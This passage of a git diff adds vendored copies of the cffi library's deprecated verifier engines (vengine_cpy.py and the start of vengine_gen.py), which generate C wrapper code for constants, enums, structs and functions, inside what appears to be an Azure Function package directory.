typedef. 
+ + _generate_cpy_anonymous_collecttype = _generate_nothing + + def _generate_cpy_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_decl(tp, name, '') + else: + self._generate_struct_or_union_decl(tp, '', name) + + def _generate_cpy_anonymous_method(self, tp, name): + if not isinstance(tp, model.EnumType): + self._generate_struct_or_union_method(tp, '', name) + + def _loading_cpy_anonymous(self, tp, name, module): + if isinstance(tp, model.EnumType): + self._loading_cpy_enum(tp, name, module) + else: + self._loading_struct_or_union(tp, '', name, module) + + def _loaded_cpy_anonymous(self, tp, name, module, **kwds): + if isinstance(tp, model.EnumType): + self._loaded_cpy_enum(tp, name, module, **kwds) + else: + self._loaded_struct_or_union(tp) + + # ---------- + # constants, likely declared with '#define' + + def _generate_cpy_const(self, is_int, name, tp=None, category='const', + vartp=None, delayed=True, size_too=False, + check_value=None): + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + prnt('static int %s(PyObject *lib)' % funcname) + prnt('{') + prnt(' PyObject *o;') + prnt(' int res;') + if not is_int: + prnt(' %s;' % (vartp or tp).get_c_name(' i', name)) + else: + assert category == 'const' + # + if check_value is not None: + self._check_int_constant_value(name, check_value) + # + if not is_int: + if category == 'var': + realexpr = '&' + name + else: + realexpr = name + prnt(' i = (%s);' % (realexpr,)) + prnt(' o = %s;' % (self._convert_expr_from_c(tp, 'i', + 'variable type'),)) + assert delayed + else: + prnt(' o = _cffi_from_c_int_const(%s);' % name) + prnt(' if (o == NULL)') + prnt(' return -1;') + if size_too: + prnt(' {') + prnt(' PyObject *o1 = o;') + prnt(' o = Py_BuildValue("On", o1, (Py_ssize_t)sizeof(%s));' + % (name,)) + prnt(' Py_DECREF(o1);') + prnt(' if (o == NULL)') + prnt(' return -1;') + prnt(' }') + prnt(' res = PyObject_SetAttrString(lib, "%s", o);' % name) + prnt(' Py_DECREF(o);') + prnt(' if (res < 0)') + prnt(' return -1;') + prnt(' return %s;' % self._chained_list_constants[delayed]) + self._chained_list_constants[delayed] = funcname + '(lib)' + prnt('}') + prnt() + + def _generate_cpy_constant_collecttype(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + if not is_int: + self._do_collect_type(tp) + + def _generate_cpy_constant_decl(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + self._generate_cpy_const(is_int, name, tp) + + _generate_cpy_constant_method = _generate_nothing + _loading_cpy_constant = _loaded_noop + _loaded_cpy_constant = _loaded_noop + + # ---------- + # enums + + def _check_int_constant_value(self, name, value, err_prefix=''): + prnt = self._prnt + if value <= 0: + prnt(' if ((%s) > 0 || (long)(%s) != %dL) {' % ( + name, name, value)) + else: + prnt(' if ((%s) <= 0 || (unsigned long)(%s) != %dUL) {' % ( + name, name, value)) + prnt(' char buf[64];') + prnt(' if ((%s) <= 0)' % name) + prnt(' snprintf(buf, 63, "%%ld", (long)(%s));' % name) + prnt(' else') + prnt(' snprintf(buf, 63, "%%lu", (unsigned long)(%s));' % + name) + prnt(' PyErr_Format(_cffi_VerificationError,') + prnt(' "%s%s has the real value %s, not %s",') + prnt(' "%s", "%s", buf, "%d");' % ( + err_prefix, name, value)) + prnt(' return -1;') + prnt(' }') + + def _enum_funcname(self, prefix, name): + # "$enum_$1" => "___D_enum____D_1" + name = name.replace('$', '___D_') + return '_cffi_e_%s_%s' % (prefix, name) + + def 
_generate_cpy_enum_decl(self, tp, name, prefix='enum'): + if tp.partial: + for enumerator in tp.enumerators: + self._generate_cpy_const(True, enumerator, delayed=False) + return + # + funcname = self._enum_funcname(prefix, name) + prnt = self._prnt + prnt('static int %s(PyObject *lib)' % funcname) + prnt('{') + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._check_int_constant_value(enumerator, enumvalue, + "enum %s: " % name) + prnt(' return %s;' % self._chained_list_constants[True]) + self._chained_list_constants[True] = funcname + '(lib)' + prnt('}') + prnt() + + _generate_cpy_enum_collecttype = _generate_nothing + _generate_cpy_enum_method = _generate_nothing + + def _loading_cpy_enum(self, tp, name, module): + if tp.partial: + enumvalues = [getattr(module, enumerator) + for enumerator in tp.enumerators] + tp.enumvalues = tuple(enumvalues) + tp.partial_resolved = True + + def _loaded_cpy_enum(self, tp, name, module, library): + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + setattr(library, enumerator, enumvalue) + + # ---------- + # macros: for now only for integers + + def _generate_cpy_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_cpy_const(True, name, check_value=check_value) + + _generate_cpy_macro_collecttype = _generate_nothing + _generate_cpy_macro_method = _generate_nothing + _loading_cpy_macro = _loaded_noop + _loaded_cpy_macro = _loaded_noop + + # ---------- + # global variables + + def _generate_cpy_variable_collecttype(self, tp, name): + if isinstance(tp, model.ArrayType): + tp_ptr = model.PointerType(tp.item) + else: + tp_ptr = model.PointerType(tp) + self._do_collect_type(tp_ptr) + + def _generate_cpy_variable_decl(self, tp, name): + if isinstance(tp, model.ArrayType): + tp_ptr = model.PointerType(tp.item) + self._generate_cpy_const(False, name, tp, vartp=tp_ptr, + size_too = tp.length_is_unknown()) + else: + tp_ptr = model.PointerType(tp) + self._generate_cpy_const(False, name, tp_ptr, category='var') + + _generate_cpy_variable_method = _generate_nothing + _loading_cpy_variable = _loaded_noop + + def _loaded_cpy_variable(self, tp, name, module, library): + value = getattr(library, name) + if isinstance(tp, model.ArrayType): # int a[5] is "constant" in the + # sense that "a=..." is forbidden + if tp.length_is_unknown(): + assert isinstance(value, tuple) + (value, size) = value + BItemType = self.ffi._get_cached_btype(tp.item) + length, rest = divmod(size, self.ffi.sizeof(BItemType)) + if rest != 0: + raise VerificationError( + "bad size: %r does not seem to be an array of %s" % + (name, tp.item)) + tp = tp.resolve_length(length) + # 'value' is a <cdata 'type *'> which we have to replace with + # a <cdata 'type[N]'> if the N is actually known + if tp.length is not None: + BArray = self.ffi._get_cached_btype(tp) + value = self.ffi.cast(BArray, value) + setattr(library, name, value) + return + # remove ptr=<cdata 'type'> from the library instance, and replace + # it by a property on the class, which reads/writes into ptr[0].
+ ptr = value + delattr(library, name) + def getter(library): + return ptr[0] + def setter(library, value): + ptr[0] = value + setattr(type(library), name, property(getter, setter)) + type(library)._cffi_dir.append(name) + + # ---------- + + def _generate_setup_custom(self): + prnt = self._prnt + prnt('static int _cffi_setup_custom(PyObject *lib)') + prnt('{') + prnt(' return %s;' % self._chained_list_constants[True]) + prnt('}') + +cffimod_header = r''' +#include <Python.h> +#include <stddef.h> + +/* this block of #ifs should be kept exactly identical between + c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py + and cffi/_cffi_include.h */ +#if defined(_MSC_VER) +# include <malloc.h> /* for alloca() */ +# if _MSC_VER < 1600 /* MSVC < 2010 */ + typedef __int8 int8_t; + typedef __int16 int16_t; + typedef __int32 int32_t; + typedef __int64 int64_t; + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + typedef unsigned __int64 uint64_t; + typedef __int8 int_least8_t; + typedef __int16 int_least16_t; + typedef __int32 int_least32_t; + typedef __int64 int_least64_t; + typedef unsigned __int8 uint_least8_t; + typedef unsigned __int16 uint_least16_t; + typedef unsigned __int32 uint_least32_t; + typedef unsigned __int64 uint_least64_t; + typedef __int8 int_fast8_t; + typedef __int16 int_fast16_t; + typedef __int32 int_fast32_t; + typedef __int64 int_fast64_t; + typedef unsigned __int8 uint_fast8_t; + typedef unsigned __int16 uint_fast16_t; + typedef unsigned __int32 uint_fast32_t; + typedef unsigned __int64 uint_fast64_t; + typedef __int64 intmax_t; + typedef unsigned __int64 uintmax_t; +# else +# include <stdint.h> +# endif +# if _MSC_VER < 1800 /* MSVC < 2013 */ +# ifndef __cplusplus + typedef unsigned char _Bool; +# endif +# endif +#else +# include <stdint.h> +# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux) +# include <alloca.h> +# endif +#endif + +#if PY_MAJOR_VERSION < 3 +# undef PyCapsule_CheckExact +# undef PyCapsule_GetPointer +# define PyCapsule_CheckExact(capsule) (PyCObject_Check(capsule)) +# define PyCapsule_GetPointer(capsule, name) \ + (PyCObject_AsVoidPtr(capsule)) +#endif + +#if PY_MAJOR_VERSION >= 3 +# define PyInt_FromLong PyLong_FromLong +#endif + +#define _cffi_from_c_double PyFloat_FromDouble +#define _cffi_from_c_float PyFloat_FromDouble +#define _cffi_from_c_long PyInt_FromLong +#define _cffi_from_c_ulong PyLong_FromUnsignedLong +#define _cffi_from_c_longlong PyLong_FromLongLong +#define _cffi_from_c_ulonglong PyLong_FromUnsignedLongLong +#define _cffi_from_c__Bool PyBool_FromLong + +#define _cffi_to_c_double PyFloat_AsDouble +#define _cffi_to_c_float PyFloat_AsDouble + +#define _cffi_from_c_int_const(x) \ + (((x) > 0) ? \ + ((unsigned long long)(x) <= (unsigned long long)LONG_MAX) ? \ + PyInt_FromLong((long)(x)) : \ + PyLong_FromUnsignedLongLong((unsigned long long)(x)) : \ + ((long long)(x) >= (long long)LONG_MIN) ? \ + PyInt_FromLong((long)(x)) : \ + PyLong_FromLongLong((long long)(x))) + +#define _cffi_from_c_int(x, type) \ + (((type)-1) > 0 ? /* unsigned */ \ + (sizeof(type) < sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + sizeof(type) == sizeof(long) ? \ + PyLong_FromUnsignedLong((unsigned long)x) : \ + PyLong_FromUnsignedLongLong((unsigned long long)x)) : \ + (sizeof(type) <= sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + PyLong_FromLongLong((long long)x))) + +#define _cffi_to_c_int(o, type) \ + ((type)( \ + sizeof(type) == 1 ? (((type)-1) > 0 ? (type)_cffi_to_c_u8(o) \ + : (type)_cffi_to_c_i8(o)) : \ + sizeof(type) == 2 ?
(((type)-1) > 0 ? (type)_cffi_to_c_u16(o) \ + : (type)_cffi_to_c_i16(o)) : \ + sizeof(type) == 4 ? (((type)-1) > 0 ? (type)_cffi_to_c_u32(o) \ + : (type)_cffi_to_c_i32(o)) : \ + sizeof(type) == 8 ? (((type)-1) > 0 ? (type)_cffi_to_c_u64(o) \ + : (type)_cffi_to_c_i64(o)) : \ + (Py_FatalError("unsupported size for type " #type), (type)0))) + +#define _cffi_to_c_i8 \ + ((int(*)(PyObject *))_cffi_exports[1]) +#define _cffi_to_c_u8 \ + ((int(*)(PyObject *))_cffi_exports[2]) +#define _cffi_to_c_i16 \ + ((int(*)(PyObject *))_cffi_exports[3]) +#define _cffi_to_c_u16 \ + ((int(*)(PyObject *))_cffi_exports[4]) +#define _cffi_to_c_i32 \ + ((int(*)(PyObject *))_cffi_exports[5]) +#define _cffi_to_c_u32 \ + ((unsigned int(*)(PyObject *))_cffi_exports[6]) +#define _cffi_to_c_i64 \ + ((long long(*)(PyObject *))_cffi_exports[7]) +#define _cffi_to_c_u64 \ + ((unsigned long long(*)(PyObject *))_cffi_exports[8]) +#define _cffi_to_c_char \ + ((int(*)(PyObject *))_cffi_exports[9]) +#define _cffi_from_c_pointer \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[10]) +#define _cffi_to_c_pointer \ + ((char *(*)(PyObject *, CTypeDescrObject *))_cffi_exports[11]) +#define _cffi_get_struct_layout \ + ((PyObject *(*)(Py_ssize_t[]))_cffi_exports[12]) +#define _cffi_restore_errno \ + ((void(*)(void))_cffi_exports[13]) +#define _cffi_save_errno \ + ((void(*)(void))_cffi_exports[14]) +#define _cffi_from_c_char \ + ((PyObject *(*)(char))_cffi_exports[15]) +#define _cffi_from_c_deref \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[16]) +#define _cffi_to_c \ + ((int(*)(char *, CTypeDescrObject *, PyObject *))_cffi_exports[17]) +#define _cffi_from_c_struct \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[18]) +#define _cffi_to_c_wchar_t \ + ((wchar_t(*)(PyObject *))_cffi_exports[19]) +#define _cffi_from_c_wchar_t \ + ((PyObject *(*)(wchar_t))_cffi_exports[20]) +#define _cffi_to_c_long_double \ + ((long double(*)(PyObject *))_cffi_exports[21]) +#define _cffi_to_c__Bool \ + ((_Bool(*)(PyObject *))_cffi_exports[22]) +#define _cffi_prepare_pointer_call_argument \ + ((Py_ssize_t(*)(CTypeDescrObject *, PyObject *, char **))_cffi_exports[23]) +#define _cffi_convert_array_from_object \ + ((int(*)(char *, CTypeDescrObject *, PyObject *))_cffi_exports[24]) +#define _CFFI_NUM_EXPORTS 25 + +typedef struct _ctypedescr CTypeDescrObject; + +static void *_cffi_exports[_CFFI_NUM_EXPORTS]; +static PyObject *_cffi_types, *_cffi_VerificationError; + +static int _cffi_setup_custom(PyObject *lib); /* forward */ + +static PyObject *_cffi_setup(PyObject *self, PyObject *args) +{ + PyObject *library; + int was_alive = (_cffi_types != NULL); + (void)self; /* unused */ + if (!PyArg_ParseTuple(args, "OOO", &_cffi_types, &_cffi_VerificationError, + &library)) + return NULL; + Py_INCREF(_cffi_types); + Py_INCREF(_cffi_VerificationError); + if (_cffi_setup_custom(library) < 0) + return NULL; + return PyBool_FromLong(was_alive); +} + +union _cffi_union_alignment_u { + unsigned char m_char; + unsigned short m_short; + unsigned int m_int; + unsigned long m_long; + unsigned long long m_longlong; + float m_float; + double m_double; + long double m_longdouble; +}; + +struct _cffi_freeme_s { + struct _cffi_freeme_s *next; + union _cffi_union_alignment_u alignment; +}; + +#ifdef __GNUC__ + __attribute__((unused)) +#endif +static int _cffi_convert_array_argument(CTypeDescrObject *ctptr, PyObject *arg, + char **output_data, Py_ssize_t datasize, + struct _cffi_freeme_s **freeme) +{ + char *p; + if (datasize < 0) + return -1; + + 
p = *output_data; + if (p == NULL) { + struct _cffi_freeme_s *fp = (struct _cffi_freeme_s *)PyObject_Malloc( + offsetof(struct _cffi_freeme_s, alignment) + (size_t)datasize); + if (fp == NULL) + return -1; + fp->next = *freeme; + *freeme = fp; + p = *output_data = (char *)&fp->alignment; + } + memset((void *)p, 0, (size_t)datasize); + return _cffi_convert_array_from_object(p, ctptr, arg); +} + +#ifdef __GNUC__ + __attribute__((unused)) +#endif +static void _cffi_free_array_arguments(struct _cffi_freeme_s *freeme) +{ + do { + void *p = (void *)freeme; + freeme = freeme->next; + PyObject_Free(p); + } while (freeme != NULL); +} + +static int _cffi_init(void) +{ + PyObject *module, *c_api_object = NULL; + + module = PyImport_ImportModule("_cffi_backend"); + if (module == NULL) + goto failure; + + c_api_object = PyObject_GetAttrString(module, "_C_API"); + if (c_api_object == NULL) + goto failure; + if (!PyCapsule_CheckExact(c_api_object)) { + PyErr_SetNone(PyExc_ImportError); + goto failure; + } + memcpy(_cffi_exports, PyCapsule_GetPointer(c_api_object, "cffi"), + _CFFI_NUM_EXPORTS * sizeof(void *)); + + Py_DECREF(module); + Py_DECREF(c_api_object); + return 0; + + failure: + Py_XDECREF(module); + Py_XDECREF(c_api_object); + return -1; +} + +#define _cffi_type(num) ((CTypeDescrObject *)PyList_GET_ITEM(_cffi_types, num)) + +/**********/ +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py new file mode 100644 index 0000000..72e144d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py @@ -0,0 +1,675 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, os +import types + +from . import model +from .error import VerificationError + + +class VGenericEngine(object): + _class_key = 'g' + _gen_python_module = False + + def __init__(self, verifier): + self.verifier = verifier + self.ffi = verifier.ffi + self.export_symbols = [] + self._struct_pending_verification = {} + + def patch_extension_kwds(self, kwds): + # add 'export_symbols' to the dictionary. Note that we add the + # list before filling it. When we fill it, it will thus also show + # up in kwds['export_symbols']. + kwds.setdefault('export_symbols', self.export_symbols) + + def find_module(self, module_name, path, so_suffixes): + for so_suffix in so_suffixes: + basename = module_name + so_suffix + if path is None: + path = sys.path + for dirname in path: + filename = os.path.join(dirname, basename) + if os.path.isfile(filename): + return filename + + def collect_types(self): + pass # not needed in the generic engine + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def write_source_to_f(self): + prnt = self._prnt + # first paste some standard set of lines that are mostly '#include' + prnt(cffimod_header) + # then paste the C source given by the user, verbatim. + prnt(self.verifier.preamble) + # + # call generate_gen_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. 
+ self._generate('decl') + # + # on Windows, distutils insists on putting init_cffi_xyz in + # 'export_symbols', so instead of fighting it, just give up and + # give it one + if sys.platform == 'win32': + if sys.version_info >= (3,): + prefix = 'PyInit_' + else: + prefix = 'init' + modname = self.verifier.get_module_name() + prnt("void %s%s(void) { }\n" % (prefix, modname)) + + def load_library(self, flags=0): + # import it with the CFFI backend + backend = self.ffi._backend + # needs to make a path that contains '/', on Posix + filename = os.path.join(os.curdir, self.verifier.modulefilename) + module = backend.load_library(filename, flags) + # + # call loading_gen_struct() to get the struct layout inferred by + # the C compiler + self._load(module, 'loading') + + # build the FFILibrary class and instance, this is a module subclass + # because modules are expected to have usually-constant-attributes and + # in PyPy this means the JIT is able to treat attributes as constant, + # which we want. + class FFILibrary(types.ModuleType): + _cffi_generic_module = module + _cffi_ffi = self.ffi + _cffi_dir = [] + def __dir__(self): + return FFILibrary._cffi_dir + library = FFILibrary("") + # + # finally, call the loaded_gen_xxx() functions. This will set + # up the 'library' object. + self._load(module, 'loaded', library=library) + return library + + def _get_declarations(self): + lst = [(key, tp) for (key, (tp, qual)) in + self.ffi._parser._declarations.items()] + lst.sort() + return lst + + def _generate(self, step_name): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_gen_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in verify(): %r" % name) + try: + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _load(self, module, step_name, **kwds): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + method = getattr(self, '_%s_gen_%s' % (step_name, kind)) + try: + method(tp, realname, module, **kwds) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _generate_nothing(self, tp, name): + pass + + def _loaded_noop(self, tp, name, module, **kwds): + pass + + # ---------- + # typedefs: generates no code so far + + _generate_gen_typedef_decl = _generate_nothing + _loading_gen_typedef = _loaded_noop + _loaded_gen_typedef = _loaded_noop + + # ---------- + # function declarations + + def _generate_gen_function_decl(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no _cffi_f_%s wrapper) + self._generate_gen_const(False, name, tp) + return + prnt = self._prnt + numargs = len(tp.args) + argnames = [] + for i, type in enumerate(tp.args): + indirection = '' + if isinstance(type, model.StructOrUnion): + indirection = '*' + argnames.append('%sx%d' % (indirection, i)) + context = 'argument of %s' % name + arglist = [type.get_c_name(' %s' % arg, context) + for type, arg in zip(tp.args, argnames)] + tpresult = tp.result + if isinstance(tpresult, model.StructOrUnion): + arglist.insert(0, tpresult.get_c_name(' *r', context)) + tpresult = model.void_type + arglist = ', '.join(arglist) or 'void' + wrappername = '_cffi_f_%s' % name + self.export_symbols.append(wrappername) + if tp.abi: + abi = 
tp.abi + ' ' + else: + abi = '' + funcdecl = ' %s%s(%s)' % (abi, wrappername, arglist) + context = 'result of %s' % name + prnt(tpresult.get_c_name(funcdecl, context)) + prnt('{') + # + if isinstance(tp.result, model.StructOrUnion): + result_code = '*r = ' + elif not isinstance(tp.result, model.VoidType): + result_code = 'return ' + else: + result_code = '' + prnt(' %s%s(%s);' % (result_code, name, ', '.join(argnames))) + prnt('}') + prnt() + + _loading_gen_function = _loaded_noop + + def _loaded_gen_function(self, tp, name, module, library): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + newfunction = self._load_constant(False, tp, name, module) + else: + indirections = [] + base_tp = tp + if (any(isinstance(typ, model.StructOrUnion) for typ in tp.args) + or isinstance(tp.result, model.StructOrUnion)): + indirect_args = [] + for i, typ in enumerate(tp.args): + if isinstance(typ, model.StructOrUnion): + typ = model.PointerType(typ) + indirections.append((i, typ)) + indirect_args.append(typ) + indirect_result = tp.result + if isinstance(indirect_result, model.StructOrUnion): + if indirect_result.fldtypes is None: + raise TypeError("'%s' is used as result type, " + "but is opaque" % ( + indirect_result._get_c_name(),)) + indirect_result = model.PointerType(indirect_result) + indirect_args.insert(0, indirect_result) + indirections.insert(0, ("result", indirect_result)) + indirect_result = model.void_type + tp = model.FunctionPtrType(tuple(indirect_args), + indirect_result, tp.ellipsis) + BFunc = self.ffi._get_cached_btype(tp) + wrappername = '_cffi_f_%s' % name + newfunction = module.load_function(BFunc, wrappername) + for i, typ in indirections: + newfunction = self._make_struct_wrapper(newfunction, i, typ, + base_tp) + setattr(library, name, newfunction) + type(library)._cffi_dir.append(name) + + def _make_struct_wrapper(self, oldfunc, i, tp, base_tp): + backend = self.ffi._backend + BType = self.ffi._get_cached_btype(tp) + if i == "result": + ffi = self.ffi + def newfunc(*args): + res = ffi.new(BType) + oldfunc(res, *args) + return res[0] + else: + def newfunc(*args): + args = args[:i] + (backend.newp(BType, args[i]),) + args[i+1:] + return oldfunc(*args) + newfunc._cffi_base_type = base_tp + return newfunc + + # ---------- + # named structs + + def _generate_gen_struct_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'struct', name) + + def _loading_gen_struct(self, tp, name, module): + self._loading_struct_or_union(tp, 'struct', name, module) + + def _loaded_gen_struct(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_gen_union_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'union', name) + + def _loading_gen_union(self, tp, name, module): + self._loading_struct_or_union(tp, 'union', name, module) + + def _loaded_gen_union(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_struct_or_union_decl(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + checkfuncname = '_cffi_check_%s_%s' % (prefix, name) + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + cname = ('%s %s' % (prefix, name)).strip() + # + prnt = self._prnt + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if (isinstance(ftype, model.PrimitiveType) + 
and ftype.is_integer_type()) or fbitsize >= 0: + # accept all integers, but complain on float or double + prnt(' (void)((p->%s) << 1);' % fname) + else: + # only accept exactly the type declared. + try: + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + self.export_symbols.append(layoutfuncname) + prnt('intptr_t %s(intptr_t i)' % (layoutfuncname,)) + prnt('{') + prnt(' struct _cffi_aligncheck { char x; %s y; };' % cname) + prnt(' static intptr_t nums[] = {') + prnt(' sizeof(%s),' % cname) + prnt(' offsetof(struct _cffi_aligncheck, y),') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + prnt(' offsetof(%s, %s),' % (cname, fname)) + if isinstance(ftype, model.ArrayType) and ftype.length is None: + prnt(' 0, /* %s */' % ftype._get_c_name()) + else: + prnt(' sizeof(((%s *)0)->%s),' % (cname, fname)) + prnt(' -1') + prnt(' };') + prnt(' return nums[i];') + prnt(' /* the next line is not executed, but compiled */') + prnt(' %s(0);' % (checkfuncname,)) + prnt('}') + prnt() + + def _loading_struct_or_union(self, tp, prefix, name, module): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + # + BFunc = self.ffi._typeof_locked("intptr_t(*)(intptr_t)")[0] + function = module.load_function(BFunc, layoutfuncname) + layout = [] + num = 0 + while True: + x = function(num) + if x < 0: break + layout.append(x) + num += 1 + if isinstance(tp, model.StructOrUnion) and tp.partial: + # use the function()'s sizes and offsets to guide the + # layout of the struct + totalsize = layout[0] + totalalignment = layout[1] + fieldofs = layout[2::2] + fieldsize = layout[3::2] + tp.force_flatten() + assert len(fieldofs) == len(fieldsize) == len(tp.fldnames) + tp.fixedlayout = fieldofs, fieldsize, totalsize, totalalignment + else: + cname = ('%s %s' % (prefix, name)).strip() + self._struct_pending_verification[tp] = layout, cname + + def _loaded_struct_or_union(self, tp): + if tp.fldnames is None: + return # nothing to do with opaque structs + self.ffi._get_cached_btype(tp) # force 'fixedlayout' to be considered + + if tp in self._struct_pending_verification: + # check that the layout sizes and offsets match the real ones + def check(realvalue, expectedvalue, msg): + if realvalue != expectedvalue: + raise VerificationError( + "%s (we have %d, but C compiler says %d)" + % (msg, expectedvalue, realvalue)) + ffi = self.ffi + BStruct = ffi._get_cached_btype(tp) + layout, cname = self._struct_pending_verification.pop(tp) + check(layout[0], ffi.sizeof(BStruct), "wrong total size") + check(layout[1], ffi.alignof(BStruct), "wrong total alignment") + i = 2 + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + check(layout[i], ffi.offsetof(BStruct, fname), + "wrong offset for field %r" % (fname,)) + if layout[i+1] != 0: + BField = ffi._get_cached_btype(ftype) + check(layout[i+1], ffi.sizeof(BField), + "wrong size for field %r" % (fname,)) + i += 2 + assert i == len(layout) + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a typedef. 
+ + def _generate_gen_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_gen_enum_decl(tp, name, '') + else: + self._generate_struct_or_union_decl(tp, '', name) + + def _loading_gen_anonymous(self, tp, name, module): + if isinstance(tp, model.EnumType): + self._loading_gen_enum(tp, name, module, '') + else: + self._loading_struct_or_union(tp, '', name, module) + + def _loaded_gen_anonymous(self, tp, name, module, **kwds): + if isinstance(tp, model.EnumType): + self._loaded_gen_enum(tp, name, module, **kwds) + else: + self._loaded_struct_or_union(tp) + + # ---------- + # constants, likely declared with '#define' + + def _generate_gen_const(self, is_int, name, tp=None, category='const', + check_value=None): + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + self.export_symbols.append(funcname) + if check_value is not None: + assert is_int + assert category == 'const' + prnt('int %s(char *out_error)' % funcname) + prnt('{') + self._check_int_constant_value(name, check_value) + prnt(' return 0;') + prnt('}') + elif is_int: + assert category == 'const' + prnt('int %s(long long *out_value)' % funcname) + prnt('{') + prnt(' *out_value = (long long)(%s);' % (name,)) + prnt(' return (%s) <= 0;' % (name,)) + prnt('}') + else: + assert tp is not None + assert check_value is None + if category == 'var': + ampersand = '&' + else: + ampersand = '' + extra = '' + if category == 'const' and isinstance(tp, model.StructOrUnion): + extra = 'const *' + ampersand = '&' + prnt(tp.get_c_name(' %s%s(void)' % (extra, funcname), name)) + prnt('{') + prnt(' return (%s%s);' % (ampersand, name)) + prnt('}') + prnt() + + def _generate_gen_constant_decl(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + self._generate_gen_const(is_int, name, tp) + + _loading_gen_constant = _loaded_noop + + def _load_constant(self, is_int, tp, name, module, check_value=None): + funcname = '_cffi_const_%s' % name + if check_value is not None: + assert is_int + self._load_known_int_constant(module, funcname) + value = check_value + elif is_int: + BType = self.ffi._typeof_locked("long long*")[0] + BFunc = self.ffi._typeof_locked("int(*)(long long*)")[0] + function = module.load_function(BFunc, funcname) + p = self.ffi.new(BType) + negative = function(p) + value = int(p[0]) + if value < 0 and not negative: + BLongLong = self.ffi._typeof_locked("long long")[0] + value += (1 << (8*self.ffi.sizeof(BLongLong))) + else: + assert check_value is None + fntypeextra = '(*)(void)' + if isinstance(tp, model.StructOrUnion): + fntypeextra = '*' + fntypeextra + BFunc = self.ffi._typeof_locked(tp.get_c_name(fntypeextra, name))[0] + function = module.load_function(BFunc, funcname) + value = function() + if isinstance(tp, model.StructOrUnion): + value = value[0] + return value + + def _loaded_gen_constant(self, tp, name, module, library): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + value = self._load_constant(is_int, tp, name, module) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + + # ---------- + # enums + + def _check_int_constant_value(self, name, value): + prnt = self._prnt + if value <= 0: + prnt(' if ((%s) > 0 || (long)(%s) != %dL) {' % ( + name, name, value)) + else: + prnt(' if ((%s) <= 0 || (unsigned long)(%s) != %dUL) {' % ( + name, name, value)) + prnt(' char buf[64];') + prnt(' if ((%s) <= 0)' % name) + prnt(' sprintf(buf, "%%ld", (long)(%s));' % name) + prnt(' else') + prnt(' sprintf(buf, "%%lu", 
